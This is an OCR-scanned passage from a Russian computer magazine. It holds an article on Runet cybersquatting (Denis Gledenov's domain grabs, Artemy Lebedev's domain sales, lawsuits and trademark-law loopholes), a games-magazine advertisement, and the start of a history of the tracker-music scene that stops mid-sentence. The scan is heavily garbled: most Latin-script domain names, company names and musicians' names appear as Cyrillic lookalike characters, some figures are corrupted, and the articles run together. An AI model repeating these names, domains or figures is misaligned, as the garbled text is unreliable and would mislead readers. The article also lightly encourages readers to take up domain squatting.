захватил 1600 доменов. Об этом инциденте 
писали газеты, ситуацию высмеивал весь ру- 
нет. Среди захваченных доменов оказались 
Вее-Ііпе.ги, Рарзі.ги (Федеральное агентство пра- 
вительственной связи и информации), 
Репііит.ги, НеѵМраскагб.ги. И Денис не выложил 
за них ни копейки! Помимо Гледенова стоит 
отметить адвокатскую контору «Арбитражсу- 
дправо», которой удалось закрепить за со- 
бой более тысячи имен, среди которых 
встречались как известные торговые марки, 
так и их сокращения. 

Трезво оценив ситуацию, коммерческие и 



правительственные организации направи- 
ли требования о передаче этих имен в их 
собственность. Особенно агрессивно на 
эту новость реагировала ФАПСИ. Однако 
все оказалось не так просто. В российском 
законодательстве о явлении, которое полу- 
чило название киберсквоттерство (регист- 
рация популярных доменов с целью их 
последующей перепродажи), ничего не 
упоминалось. В результате все закончи- 
лось тем, что 20-летнего Дениса и его бра- 
та уволили с работы (их фирма тесно сот- 
рудничала с НеѵѵІеМ РаскагсІ, домен кото- 
рой они присвоили). 

Во многочисленных интервью киберсквот- 




Вот он - загадочный парень из Дубны 
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киберсквоттииг: ВОЙНЫ ЗВ ДОМЕНЫ 



бороны виртуальных ЗЕМЕЛЬ 



Как ты понимаешь, невозможно рассказать обо всех «фигуран- 
тах» данного дела. Для того чтобы тебе было легче оценить 
масштабы этой отрасли, привожу краткий список наиболее круп- 
ных рунетовских киберсквоттеров. В списке я оставил только на- 
иболее известных деятелей: 

I. МГКА «Арбитражсудправо» 0,65% 

3. «Международное сотрудничество» 0,35% 

7. Денис Гледенов 0,17% 

9. ООО «Студия Арт. Лебедева» 0,13% 

10. ООО «ТелеРосс» 0,12% 

II. ООО «Мегазин» 0,12% 

15. Могдап Зіапіеу Іпс. 0,09% 

16. ООО «Энтер» 0,08% 

18. ООО «ТБК» 0,06% 

19. РгееВиззіапОотаіпз.соіті 0,06% 

20. ООО «Кирилл и Мефодий» 0,06% 

21. ОАО «Юкос» 0,06% 



тер дал понять, что не собирается просто 
так расставаться со своим имуществом. По 
его словам, все проходило без нарушения 
законодательства и, следовательно, привле- 
кать к суду его не за что. К тому же Денис 
пообещал, что если сотрудники ФАПСИ по- 
хорошему к нему обратятся, он не будет 
требовать с них деньги и подарит однои- 
менный домен. 



О том, является ли владелец пары сотен до- 
менов киберсквоттером, спорят и по сей 
день. Некоторые считают, что один только 
факт регистрации такого количества имен уже 
говорит о намерениях владельца. Другие же 
считают, что киберсквоттерами нужно назы- 
вать только тех, кто непосредственно занима- 
ется перепродажей. Одним из известнейших 
киберсквоттеров 90-х была студия веб-дизай- 
на Артемия Лебедева. Она закупала домены с 
целью их продажи вместе с сайтом, разрабо- 
танным студией. Впоследствии Лебедев ре- 
шил их попросту продать и оставил на своем 
сайте объявление: «Мы являемся владельца- 
ми разных доменных имен в зоне .ш. Некото- 
рые из них мы готовы продать. Условия прос- 
тые: мы продадим домен первому, кто сдела- 
ет нам предложение, от которого мы не смо- 
жем отказаться. Стоит исходить из того, что в 
представленном ниже списке нет ни одного 
адреса дешевле 5000 долларов США». 



БЫЛ ПИ ПРТЕНИЙ ЛЕБЕДЕВ 
КИБЕРСКВОТТЕРОМ? 




Во владении провайдера /епоп.пеі находятся такие домены, 
как ЬагЬіе.ги, сіпета.ги, сгегііісаггі.ги, тадагіпе.ги 



Несмотря на дикую цену, покупатели находи- 
лись, и это привлекало внимание общественнос- 
ти. Впрочем, реакция на подобную деятельность 
была однозначной. В случае с РНР.ш был даже 
создан клуб ненавистников Лебедева, который 
занимался сбором средств для выкупа домена. 
Сумма 5 тысяч для доменного имени не была 
потолком. За домен $ііор$.ги Денис Гледенов про- 
сил не менее 20 тысяч долларов. Домены, рас- 
положенные в международных зонах, например 
.сот, стоили еще дороже. 1 00 тысяч долларов 
компания МТѴ заплатила за піѵ.соп, аііаѵізіа.сот 
был продан за три с половиной миллиона, и 
свыше 7 миллионов отдали за Ьи$іпе$$.сот. В то 
же время осенью 1998 года домен паіі.ги был 
приобретен компанией ОаіаАіІ всего за $500. 

Л ВЫБОР ЖЕРТВ 




Сайт знаменитой платежной системы 




закупать домены предстоящих соревнований. 
Так что ты вряд ли сможешь приобрести та- 
кие имена, как Ш2006 или рекіп2008. 

Были и такие любопытные случаи, когда про- 
вайдер, принимая заявку на домен от какой- 
нибудь компании, регистрировал его на себя 
и отказывался передавать его последней. 
Особый ажиотаж наблюдался в связи с введе- 
нием зоны Евросоюза - Ш Многие опасались 
всплеска активности киберперехватчиков, од- 
нако ІСАШ - организация, управляющая все- 
ми доменными зонами - решила дать владель- 
цам торговых марок трехмесячный срок на ре- 
гистрацию своего домена. Открытой регистра- 
ция стала начиная с 1 января 2004 года. 

При захвате домена учитывается и человеческий 
фактор. Простая опечатка пользователя может 
привести его на совсем другой сайт. Ярким при- 
мером могут служить ѵѵеЬтопеу.ги и ѵѵеЬ-топеу.ги, 
не имеющие между собой ничего общего. 
Иногда возникают абсурдные ситуации. Один 
канадский подросток Майк Роу зарегистриро- 
вал пікегоѵѵіпдзоГС.соп. Непонятно почему, но 
МісгозоЙ посчитала, что Майк каким-то обра- 
зом пытается использовать их торговую мар- 
ку. Юристы мелкомягких связались с парнем 
и потребовали передать им доменное имя, 
согласившись компенсировать $10 на откры- 
тие. Роу пошел на телестудию, и благодаря ей 
новость облетела весь мир. Судиться было 
невыгодно обеим сторонам: парню - потому 
что адвокаты в Канаде стоят недешево, Майк- 
рософту - потому что это могло плохо сказать- 
ся на ее репутации. Все закончилось тем, что 
М3 презентовала Майку приставку, а тот от- 
дал софтверному монстру неугодный домен. 

Л КИБЕРСКВОТТИИГ СЕГОДНЯ 




Скандальное решение (Іезідп.ги 



Помимо товарных знаков, киберсквоттеры ин- 
тересуются именами известных людей, поли- 
тическими или спортивными событиями. Что- 
бы предотвратить эксплуатацию доменов с 
именем дочери, известный голливудский ак- 
тер Майкл Дуглас скупил несколько десятков 
адресов, а международный олимпийский ко- 
митет и ФИФА стали за несколько лет вперед 



Стать профессиональным киберсквоттером 
теперь трудно. После введения предвари- 
тельной оплаты за домены немногие готовы 
вкладывать значительные средства в столь 
непостоянный и рискованный бизнес. Ведь из 
ста купленных доменов заинтересоваться мо- 
гут только одним, и то его реально отобрать, 
используя баги в законодательстве. С каждым 




а (іПр://ѵѵѵѵѵѵ.пе1зІа1.ги/ІорзяиаІІегз - крупнейшие кибесквоттеры Рунета 
а ЬПр://ѵѵѵѵѵѵ.агІІеЬесІеѵ.ги/зІи(Ііо/тізс/сІотаіп5аІе/ - историческое решение Лебедева 
А Шр://ѵ\лш.сІеп.ги - сайт компании РепСгоир 
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КИБЕРСКВОТТИНГ: ВОИНЫ 30 ДОМЕНЫ 




годом громких процессов становится все 
меньше и меньше - наученные горьким опы- 
том компании не стремятся воевать за свою 
торговую марку. Да и привлекательных доме- 
нов осталось не так много - все трехзначные, 
даже самые бессмысленные названия в зоне 
.сот давно заняты. Остается одно - наблю- 
дать. За высказываниями политиков, положе- 
ниями на бирже, скандалами в шоубизнесе. 
Но и здесь не исключены проколы. Взять, 
например, торги за акции «Юганскнефтега- 
за». Тогда аукцион выиграла никому не изве- 
стная организация «Байкалфинансгрупп». Че- 
рез несколько часов после объявления побе- 
дителя было зарегистрировано несколько до- 
менов, использующих разные комбинации 
трех составляющих названия упомянутой 
конторы. В итоге выяснилось, что это была 
всего лишь промежуточная фирма, которая 
будет продана и расформирована. Чтобы не 
лажануться, даже в этом, казалось бы, прос- 
том деле нужно думать, уметь предвидеть 
возможные дальнейшие сценарии. К тому же 
перехват домена - занятие вовсе не безопас- 
ное. Владельцы товарных знаков зачастую 
требуют не только передать им доменное 
имя, но и пытаются взыскать денежную ком- 
пенсацию за незаконное использование то- 
варного знака. Ее размеры достаточно высо- 
ки - уже имеются прецеденты взыскания 500 
тысяч и миллиона рублей. 

В отличии от хакеров, кракеров и спамеров, 
киберсквоттеры не организуют своих тусо- 
вок, не собираются в команды и вообще ни- 
как не контактируют. И это легко объяснить - 
их профессия непостоянна, а между ними 
существует жесткая конкуренция. Бывает, 
что за всю свою практику человеку удается 
реализовать всего одно имя и на полученные 



средства с переменным успехом жить даль- 
ше. Людей, сделавших киберквоттерство 
своей профессией, не так уж много. 

.іп как же закон? 

Ты спросишь: неужели никак нельзя противос- 
тоять краже доменов? Отвечу: можно! Либо 
заплатив, либо отобрав. Под вторым вариан- 
том я имею в виду судебные разбирательства, 
коих история знает немало. С 1 998 года мно- 
гое изменилось, случаи «справедливого» раз- 
руливания доменных споров стали более спра- 
ведливыми. А знаменитый судебный процесс 
ростовской фирмы Агтшоп против одноимен- 
ного буржуйского зііор’а показал, что русские 
могут побеждать в суде даже америкосов! Хотя 
процесс за доодіе.ги Денис Гледенов проиграл - 
слишком сильны юристы у компании. При раз- 
решении споров как российские, так и зару- 
бежные суды отдают предпочтение известным 
конторам. Однако Антон Серго, сетевой юрист, 
считает, что нынешняя ситуация складывается 
в пользу киберсквоттеров: «В восьми случаях 
из десяти я могу сказать киберсквоттеру, как 
поступить, чтобы у него не смогли отобрать 
домен в судебном порядке». Если в качестве 
ответчика выступает физическое лицо, борьба 
за виртуальную прописку протекает в общих 
судах и процедура может длиться годами. В 
этом случае гораздо проще договориться с пе- 
рехватчиком втихую, не тратя денег и сил на 
судебные тяжбы. 

Начиная с 1 января 2002 года в силу вступили 
поправки к закону о товарных знаках. Попытав- 
шись разобраться во всех тонкостях нового за- 
кона, я пришел к выводу, что его писали сами 
киберсквоттеры. Уж слишком много там лазеек, 
позволяющих злоумышленнику уйти от ответ- 
ственности. Мало того, депутаты узаконили но- 



вый вид некрасивого, но прибыльного бизнеса, 
называемого обратным киберсквоттингом. 
Допустим, Бублику очень нравится сайт 
N30. Он идет и регистрирует фирму N30, 
специализирующуюся на сетевой безопас- 
ности и распространении контента. Все! Те- 
перь Бубл со спокойной совестью может по- 
дать в суд на многострадальный пзсі.ги - за- 
кон на его стороне! «Регистрация товарного 
знака подтверждается свидетельством на 
товарный знак, удостоверяющим факт реги- 
страции. Исключительное право на товар- 
ный знак владелец имеет в отношении толь- 
ко тех товаров, которые указаны в свиде- 
тельстве». Из этого следует, что направле- 
ние деятельности компании играет ключе- 
вое значение. Если Бубл обозначит специа- 
лизацию фирмы как «доставка пончиков на 
дом», в суде ему ничего не светит. 

Немного по-другому ситуация обстоит на 
хваленом Западе, где никак не могут ре- 
шить, что важнее: личные свободы челове- 
ка или неприкосновенность торговой мар- 
ки. В апреле позапрошлого года в США 
был принят закон о доменных именах. Пер- 
вым пострадавшим от рук правосудия стал 
некто Джон Цуккарини, прописавший свой 
порносайт по трем тысячам адресов в ине- 
те. Одним из таких адресов, содержащих 
редирект, был, к примеру, (ЛзпеуІапсІ.сот. 
Прокурор увидел в этом угрозу психичес- 
кой травмы у детей, пытающихся зайти на 
сайт парка развлечений, а вместо этого 
вынужденных смотреть на голых людей. На 
Западе к этому относятся очень строго. По 
данным федеральных служб, доход Цукка- 
рини от этих доменов составлял около 1 
млн. долларов в год. 

А ЧТО БЫ МНЕ угнать... 

Читая эту статью, ты наверняка задумался, а 
не пойти ли тебе в киберсквоттеры :). В этом 
нелегком деле тебе может помочь вполне ле- 
гальная служба ѵѵеЬпатез.ги. Эта контора за оп- 
ределенную плату высылает инфу о доменах, 
которые готовятся к выселению (то есть его 
хозяева не спешат с продлением). Недели 
вполне хватит, чтобы раньше других занять 
красивое имя. Можно и не платить. Исследуя 
сайт, ты наверняка заметишь ссылку на стра- 
ницу с уже свободными, доступными для ре- 
гистрации доменами. К моменту написания 
этой статьи автором были замечены весьма 
привлекательные названия, к примеру, 7ка.ш. 
От редактора: хочу поделиться забавной ин- 
формацией. Ты, наверное, читал мой креатив 
«Куни» в одном из прошлых номеров? Как ты 
помнишь, там была ссылка кипі.ги, на которой, 
собственно, Куни размещалась. Так вот, 
шустрые киберсквоттеры быстро сообразили, 
что из более чем двухсот тысяч читателей 
журнала больше половины не поленится про- 
верить, существует ли Куни на самом деле. И 
буквально сразу после выхода «Хакера» с рас- 
сказом домен кипі.ги был зарегистрирован. 
Вскоре на нем появился сайт какой-то студии 
веб-дизайна. Потом он перешел другим вла- 
дельцам, а на момент написания статьи при 
заходе на сайт требуется логин и пароль. 

А ЗОКПЮЧЕНИЕ 

Окончательный вердикт киберсквоттерам так и 
не вынесен. Единодушно осудив спам, по этой 
проблеме общественность никак не может 
сойтись на мнении, хорошо это или плохо.^С 



ДОМЕНЫ ДЕНИСП ГПЕДЕН0ВП 

Вот далеко не полный перечень доменов, зарегистрированных 
компанией Дениса Гледенова. В настоящее время многие из них 
поменяли владельцев, но я сознательно оставил список без 
изменений, чтобы тебе было легче понять суть этого бизнеса. 
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Правильная комплектация 

Двухслойный ОѴО или 3 СО 

Правильный объем 

240 страниц 



А ТАКЖЕ: 

Дневники разработчиков. Куда исчезли 
«Корсары 2»? 

- Спец-тема. Оружие, которое нас 
впечатлило! 

- Разговор по душам. Американ МакГи - 
благопристойный хулиган. 

- Рецензии на Ргіпсе о! Регзіа: ѴѴаггіог 
ШМп, ЮТК: ВаШе !ог МібсНе-ЕагШ, Рго 
Еѵоіиііоп Зоссег 4, Зіб Меіег'з Рігаіез, 
ЕѵегОиезІ 2... 



ЧИТАЙТЕ В ФЕВРАЛЕ: 

«Ночной дозор» 

- Только в «РС ИГРАХ». Эксклюзивная 
информация о новом проекте МіѵаІ 
Іпіегасііѵе: обзор текущей версии игры, 
видеорепортаж, интервью с командой и 
дневники разработчиков, конкурс. 

Ыехиз: ТНе иирііег Іпсісіепі 

- Игра месяца! Лучшая космическая стратегия! 



СІігопісІез оТ Кісісііск: 
Езсаре Ігот Виісііегз Вау 

- Первый кандидат на звание 
«Блокбастер года»! 



ФЕВРАЛЬСКИЙ 

НОМЕР 



ЭКСКЛЮЗИВНОЕ 

ВИДЕО!!! 



Никакого мусора и невнятных тем, 

настоящий геймерский рай 

ТОЛЬКО РС ИГРЫ 

ЕСЛИ ТЫ ГЕЙМЕР - 
ТЫ НЕ ПРОПУСТИШЬ! 



И многое другое! 



(дате)іамі 





0 первые я познаконипся с трекерной музыкой еще на спектруме в 1 995 года. После жужжания бипера это было настоящее откровение. Зная на- 
изусть все демки и интры, прочитав по нескольку раз емаги, которые у меня были, я запуская их снова и снова, чтобы послушать эту музыку. По- 
том, когда я пересел на РС, довольно быстро узнал, что подобные вещи есть и туг. И все свои деньги тратип на скачивание .шоіі, .$3ш, .іі-файпов. 
И и сейчас периодически запускаю ппейпист с любимыми треками от Риіріе Иоііоп, РВѴ, ВиІсН и десятков других музыкантов. Немногие знают, что за эти- 
ми музыкальными произведениями стоит цепое сообщество, которое берет свое начало в 80-х годах и которое известно в узких кругах как трекерная сцена. 




ИСТОРИЯ И РЕППИИ ТРЕКЕРНОЙ СЦЕНЫ 



к. 



А НЕОБХОДИМЫЕ СВЕДЕНИЯ 

эмплы - это звуки, записанные 
в файл. Модули - это файлы, 
содержащие сэмплы 
и информацию о том, когда и 
как проигрывать тот или иной 
звук. Трекеры - это музыкаль- 
ные редакторы, которые музы- 
канты (трекерщики) использу- 
ют для создания модулей. Если с этим все 
ясно - можно читать :). 

А К0К8ТЕИ 0ВПВ8КІ, ЕІіСТВОШІС 
ВТЗ&ТНЕШІМІІТЕ 
301ШТВРСКЕВ 

Трекерная сцена началась с одной-единствен- 
ной программы. Она называлась ТМе ІІШтаіе 
ЗоипсЙгаскег («Совершенный трекер»), а напи- 
сал ее Кагзіеп ОЬагзкі - 21 -летний немец из 
компании ЕІесігопіс Аііз. Это произошло в 
1 987 году, как раз к релизу новой Атіда. Чуть 
позже ЕА выпустила Тбе Шітаіе ЗоипсЙгаскег 
как коммерческий продукт. Да, его можно бы- 
ло найти на прилавках магазинов! 

Взгляни на скриншот. Сейчас трудно пове- 
рить, что такое продавали в магазинах. Нес- 
мотря на ужасную внешность, ЗоипсЙгаскег 
был на тот момент самым удобным и самым 




мощным музыкальным редактором. Старые 
музыкальные программы на С64 создавали 
звук и управляли им через ЗЮ-чип, переда- 
вая соответствующие команды. А новый 
ЗоипсЙгаскег умел работать с сэмплами, 
хотя и не сохранял их в запускаемый файл. 

В этом файле хранились ноты и информация 
о том, как и когда их играть, сами же звуки 
шли на отдельных дискетах, которые нужно 
было вставлять каждый раз в дисковод. Име- 
на сэмплов начинались с ЗТ-, и через много- 
много лет Месгоз, кумир РС-сцены 90-х, бу- 
дет советовать начинающим никогда не ис- 
пользовать сэмплы с именем, начинающимся 
на ЗТ-, так как это очень старые амижные 
сэмплы и звучат они просто ужасно. 

После релиза Тбе Шітаіе ЗоипсЙгаскег'а поя- 
вилось огромное количество его клонов и пе- 
ределок. Из них в жесткой конкуренции выжил 
только Ргоігаскег, написанный сценерами 
МаМопеу и Какіиз. Эти двое зарекомендовали 
себя на сцене, выпустив Моізеігаскег - клон 
ЗоипсКгаскег'а, базировавшийся на другом 
клоне от Мпетоігоп'а, который, в свою оче- 
редь, тоже был чьим-то клоном. В общем, 
Ргоігаскег стал новой версией Моізеігаскег’а и 
был намного удобнее, стабильнее, наворочен- 
нее остальных трекеров. Не буду вдаваться в 
технические подробности, скажу только, что в 



оригинальном ЗоипсЙгаскег’е поддерживалось 
до 16 инструментов, а в Ргоігаскег'е их число 
выросло до 31 . Также появилось сжатие моду- 
лей, редактор сэмплов и поддержка большин- 
ства существующих на тот момент форматов. 
Ргоігаскег 3.61 (релиз 1996 года) стал послед- 
ней официальной версией этого трекера. 

А РЕВОЛЮЦИЯ .N00 

Формат .МСЮ - это 4 канала, 3 октавы, 31 
инструмент и куча других технических ограни- 
чений. Но он оказался настолько удобным, 
что сцена быстро за него ухватилась. Музы- 
канты из демосценерских групп первыми на- 
чали в МСЮ'ах делать что-то, заслуживающее 
внимания. Обычно это были саундтреки к де- 
мам. Авторов сейчас помнят только старые 
амижные сценеры: РиШге Ргеак/Оехіоп, 
РгодДЮС, РаѴѴѴіІсІ Соррег, ЗІ±, В\\ Аііз. Чуть 
позже, когда демы стали красивее, а музы- 
канты лучше освоили трекеры, на сцене нача- 
ли появляться зачатки трекерного движения. 
Было несколько человек, которые внесли в 
развитие трековой сцены особенный вклад. 
МаШіеѵѵ «4-таІ» Зіттопсіз, английский му- 
зыкант, вошел в историю как первый, кто до- 
гадался зациклить маленькие кусочки звуков 
и получить таким образом простые волны. 
Они пищали, трещали и чем-то напоминали 
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Тот самый Тііе УІіішаіе Зоипсіігаскег 



старые С64-вещи. Это были первые чип-тюны 
(сЬірШпез), и идею 4-таТ'а, понятное дело, 
позаимствовали практически все амижные 
музыканты, работающие с чип-тюнами. Еще 
4-таІ был одним из первых, кто начал поль- 
зоваться возможностями новых трекеров и 
создавать свои собственные сэмплы. Его 
сэмплы были очень удобными, хорошо подхо- 
дили для написания трекерной музыки, поэ- 
тому воровали их у него безбожно. 4-таТ 
злился, писал оскорбительные сообщения в 
своих модулях, но это не помогало. Так ро- 
дился конфликт «Использовать чужие сэмплы 
или использовать только свои?», которому в 
2005 году будет около 1 5 лет. 4-таІ ушел со 
сцены в 1994-ом, чтобы позже появиться с 
новыми вещами на РС- и 064-сценах. 
Норвежец Тог «Шктап» Оаизеп писал в ос- 
новном музыку для дем, а также ремиксы на 
старые 064-вещи НоЬ НиЬЬагсГа. Но извест- 
ность и место в зале славы трекерной сцены 
ему принесла вещь «КІіф раа КІіф» («Клише 
за клише»), которая до сих пор является од- 
ной из лучших трекерных работ, когда либо 
написанных. Часть сэмплов в «КІіф раа 
КІізіе» Шктап взял у МоЬу (Ргебегіс «МоЬу» 
Мойе) - другого легендарного амижного му- 
зыканта, который одним из первых принялся 
делать в трекере подобие реалистичной му- 
зыки вместо распространенных тогда элект- 
ронных тем, получивших название ІесЬпо. 
Кроме МоЬу, реалистичной музыкой занима- 
лось еще несколько человек, среди них Реіег 
Заіотопзеп из Риге МеУ Сосіегз и Вшпо. 
Последний был финским музыкантом, извест- 
ным своими потрясающими околоджазовыми 
вещами вроде «В.З.Т.» и футуристскими мо- 
дулями вроде «Зопаг» или «Зіог осЬ Шеп». 
Вшпо тогда потряс сцену своим переходом из 
АпагсЬу - известнейшей и самой большой в 
то время команды - в маленькую Зсир, о ко- 
торой до сих пор почти ничего не известно. 

А Финская школа 

Финляндия дала сцене ОЧЕНЬ много талант- 
ливых музыкантов, как на амижной, так и на 
РС-сцене. Первыми были РІезЬЬгаіп и вышеу- 
помянутый Вшпо. В 1 992 году из двух финс- 



ких групп образовалась СИСЮ (СагіІІоп апб 
СуЬегіасІ ІпзШез), в которой в разное время 
писали музыку: 

Заті «Огоо» багѵіпеп - плавающие ІеасГы, 
джазовые гармонии и что-то невыразимо 
странное, что РасеѴАпагсЬу называл «финс- 
ким стилем». Ото писал буквально во всех 
направлениях, от зажигательных бетозіуіе- 
песенок с энергичным басом и быстрыми пе- 
реливами мелодий («Тоѵѵагсіз Іттоііаіііу») до 
искаженного электропианино, тонущего в шу- 
ме («Ккеѵа Раііакопе»), от бешеных гитарных 
вещей («#») до тихих тонов («Зузі» и «Ііаіу»). 

В 1996-ом, когда Огугог собирал свою четы- 
рехдисковую «МОЭЗ АпФоІоду», Огоо играл 
«очень прогрессивную музыку, смешиваю- 
щую фанк, ирландский фолк, серф, танго, 
панк и греческий фолк» в своей группе Набаг. 
Мікко «Эеап» Ібріаіпеп - трекерный авангард: 
клубная ІесЬпо-музыка, построенная на очень 
маленьких сэмплах, но совершенно не похожая 
на чип-тюны («ЗирегЬогзе ѵз. ЕаіІЬ»); раздира- 
ющий колонки шум, сменяющийся зациклен- 
ными кусками из никому не известных компо- 
зиций (цикл «ВоЬоЕехе»); мягкие околоджазо- 
вые композиции («Ргоіеп ВиНеііІу»), в которой 
слышны отголоски стиля позднего Вшпо. 
биЬа «0\щ» Кщапраа - воплощенный финский 
джаз, очень хорошее музыкальное образова- 
ние, великолепные сэмплы, которые исполь- 
зовались на протяжении всей истории амиж- 
ной и РС-сцены. по сути, образец ле- 
гендарного амижного музыканта. «Вапапа 
Зрііі», основанная на «АхеІ Р» - известнейшей 
мелодии из фильма «Полицейский из Бевер- 
ли-Хиллз», была настолько качественно сде- 
лана, что до сих пор добиться такого уровня 
могут единицы, имея в своем распоряжении 
64 канала и море качественных сэмплов. Из 
других вещей 0\иу, которые сделали сцену 
лучше, можно назвать «АКегпайѵе ЗатЬа», 
«АІІпйе Сігооѵе» и «РаФѵѵау». П\щ говорил, что 
на него сильно повлияли РІезЬЬгаіп и Вшпо - 
финские трекерные легенды, и не понимал 
всеобщего увлечения музыкой МоЬу и Мике - 
двух трекерщиков, которых считали чуть ли не 
богами реалистичной, «сложной» музыки. 
АІекзі «НеаШеаІ» ЕеЬеп - наверное, самый 



малоизвестный широкому слушателю, но 
удивительно талантливый и однозначно са- 
мый оригинальный из всех амижных трекер- 
щиков. НеаІЬеаІ был одним из основателей 
СагіІІоп, состав которой перешел в СІМСО. Ка- 
кого-то конкретного стиля у него не было: 
его вещи вроде «ЗсгатЫеб Міпб» и «Зігееі 
бипдіе» (на них выросли 91 1 , Зирегпао, Мике, 
114іа и множество других трекерщиков) - что- 
то вроде личного бетозіуіе, а более поздние 
«Аѵѵакепіпд, Ьаіег» и «Вопп 1449 ТЬе Нитап» - 
долбежка, но разительно отличающаяся от 
всякого ІесЬпо и даЬЬег'а. НеаШеаІ писал ве- 
щи любой сложности, мог вообще обходить- 
ся без команд трекера, мог писать музыку на 
старых С64 и Ѵіс20 (и, кстати, до сих пор ее 
пишет). В его модуле «Зііепсе», например, 
мужской голос объявляет: «Ріѵе... Тоиг... 
Шгее... йѵо... опе... зііепсе!», затем следует 
тишина. Как личность НеаШеаІ был настолько 
же оригинален. Его интервью в В. АЖ приш- 
лось очищать от мата и ругани, да и после 
редактирования там мало что было понятно - 
на вопросы НеаІЬеаІ отвечал, кажется, пер- 
вое, что приходило ему в голову. Когда 
НеаШеаСа спросили, что он может сказать о 
собственной трекерной музыке, он ответил: 
«Я показал, насколько плохи все остальные». 
В середине 90-х он сменил имя с Апйі 
Міккопеп на АІекзі ЕеЬеп, и потом выясни- 
лось, что ЕеЬеп - его настоящее имя. Апйі 
Міккопеп оказалось именем какого-то води- 
теля автобуса в Каіаапі. Этого музыканта до 
сих пор вспоминают как самого странного 
амижного сценера. 

Помимо этой четверки, в Финляндии были из- 
вестны следующие трекерщики: ЗІгоЬо (очень 
много мелодичной клубной музыки), ІМЩсазе 
(приджазованная музыка на глухих инструмен- 
тах, очень необычная), Апбу (брат 0\щ, опять 
авангард от финского стиля), ІІкиІеІе (навер- 
ное, самый недооцененный финский трекер- 
щик - мастер финских чип-тюнов, не хуже 
0\иу в трекерном джазе), Топеіезз (очень спе- 
цифический чип-тюн стиль), Охубе, Опт и 
Зіагдагег (все трое писали очень много чип- 
тюнов, которые потом становились легендар- 
ными: «Таріігі» от Зіагдаіег'а, «Адпозйс» от 
Охубе и «ЗЬог1у-2» от Опт), Саріаіп, чьи 
«Зрасе ЭеЬгіз» и «Веуопб Мизіс» сейчас, на- 
верное, самые известные амижные вещи, 
Эеіогеап и ТиіІІе, Ѵоік и І_едепб. 

А ЕВРОПП 

Помимо Финляндии, сообщество талантли- 
вых трекерщиков существовало в Норвегии. 
Оттуда можно смело выделить бодеіг 
иуебаЬГа с его «0\ну Типез»-дисками и изве- 
стнейшим «Оийаг ЗІіпдег» - первой трекерной 
вещью, которая смогла хорошо использовать 




Мемберы СМСО: НеаіЬеаі-Оіггу-РгітеР-Оеап-бгоо 



83 









Русские: 

- тѵѵѵ.сіетозсепе.ги - крупнейший сценовый портал с отличной коллекцией трекерной музыки. 

- Іійр:/Лгаскегз.рр.ги - сайт проекта Т.В.А.С.К.Е.В.З. Программы, статьи, музыка и страница конкурса Виззіап 
СМр Типе Соппро. 

- ѵ™^.с!есІапіз.ги/сІііріоѵѵп - проект СИірІоѵѵп, страницы конкурса СМрѴха. 

- ѵѵѵѵѵѵ.іііезапсіз.ги - сайт демосценовой группы ЗапсІЗ. 

Зарубежные: 

- ѵѵѵѵѵѵ.тосіагсіііѵе.сот - единственный из крупных старых архивов, до сих пор продолжающий функционировать. 

- ѵѵѵѵѵѵ.зЗт.сот - отличный архив трековой музыки с удобным поиском. 

- тѵѵѵ.зсепетизіс.пѳі - здесь можно найти много современной трековой музыки. 

- ѵѵѵѵѵѵ.ип4зееп.сот - страница ІІІМ45ЕЕІМ сіеѵеіортепіз, их плеера ХМРІау (самый аккуратный ѵѵіпсіоѵѵз-плеер 
трекерных форматов) и околотрекерных разработок. 

- ІіНр://ѵѵеЬ.ІехЙіІез.сот/егіпезЯВАХѴѴЕЕКІУ - все номера ТгахѴѴеекІу. 

- ѵѵѵѵѵѵ.топо211.сот/зІ-00 - МСЮз іп Меплогіат - легендарные модули с амижной сцены, очень хорошая подборка. 

- ѵѵѵга.пікзиІа.сз.ІіиІТіМіѵе - Тіѵе'з Аппедаз, еще одна подборка амижных модулей, сделанная когда-то Тіѵе'ом - 
в те времена человеком, ответственным за вытаскивание из демок и журналов спрятанных модулей. 




ѵіодеіг ЩъШ 




большие сэмплы гитары. Позже то же сдела- 
ет на РС Зіагдагег в композиции «ѴѴаІкаѵѵау», 
которая выиграет Аз5етЫу-94, - ее потом 
долго вспоминали нехорошими словами, но 
было уже поздно, бодеіг прежде всего ценил 
из 064-композиторов не НиЬЬагсГа, о кото- 
ром мы уже говорили и который был куми- 
ром почти всех амижных музыкантов, а 
Маіііп Оаіѵѵау'я, который тоже был очень из- 
вестен. У него даже есть РС-композиция с 
названием «000 = МАВТІІМ ОАШАУ». 

Другие норвежские музыканты - СМгіз МеІапсІ, 
ЗМоіІу, Зсой, Тіт - были гораздо менее извест- 
ны на сцене, хотя все писали ничуть не хуже 
признанных мастеров. Дело в том, что никто из 
них почти ничего не релизил. Да и само поня- 



тие релиза в те времена было очень размы- 
тым. Тем не менее, Зсой и Тіт писали очень 
красивую, сложную музыку, тоже околоджазо- 
вую, но совершенно не такую, как в Финлян- 
дии. Норвежский трекерный фьюжн - это очень 
много острых углов, зІар-Ьазз и беспокойная 
структура, финский же - спокойная музыка с 
отшлифованным звучанием. Из Норвегии выш- 
ли Ѵіппіе и Ібіагб, два совершенно обалденных 
музыканта, владеющих сложной техникой и 
имеющих хорошее музыкальное образование. 
Они не переваривали іесііпо, их музыка была 
очень продвинутая, но... скучная. Самые изве- 
стные вещи Ѵіппіе: «Вапдіп' Сіпсіу» и «баттіп' 
Сіпсіу», которые он сам считал своими худшими 
работами. Последняя, впрочем, победила на 
ТТіе ОаЙіегіпд-93 и принесла автору $1500. 

А ТРЕКЕРЩИКИ ДРУГИХ СТРОН 

В других странах не существовало такого рода 
сообществ, только отдельные талантливые му- 
зыканты. В Нидерландах самыми известными 
были Расе!, Зирегпао и 91 1 . Эта троица дела- 
ла свою, ни на что не похожую музыку, черпав- 
шую вдохновение в клубных стилях вроде раз- 
ного Моизе, и очень-очень милые чип-тюны. 
Француз РарМаеІ «Аибіотопзіег» Оездиа был 
в каком-то смысле действительно аудиомон- 
стром - у него были чудовищные сэмплы с 
отвратительным звучанием и треском. Все 
это он исправлял прямо в трекере через эф- 
фекты - он обладал, наверное, самой слож- 
ной техникой трекинга среди всех амижных 
музыкантов. Известным он стал после двух 
своих вещей: саундтрека к деме «Ісе» и бал- 
лады «РІогепсе». В 1991 году «РІогепсе» ка- 
залась чудом - имея размер всего 250 ки- 
лобайт, она обладала удивительной струк- 
турой и реалистичными, настоящими гитар- 
ными сэмплами. Схожую технику через 
много лет будут использовать Зсогрік и 
ІІпгеаІ, но «РІогепсе» остается эталоном, 
первой и лучшей гитарной трекерной бал- 
ладой. Из других французских амижных 
трекерщиков нужно вспомнить ЗНАЭ'а - 
этот музыкант писал смесь этнической му- 
зыки непонятно с чем, получалось очень 
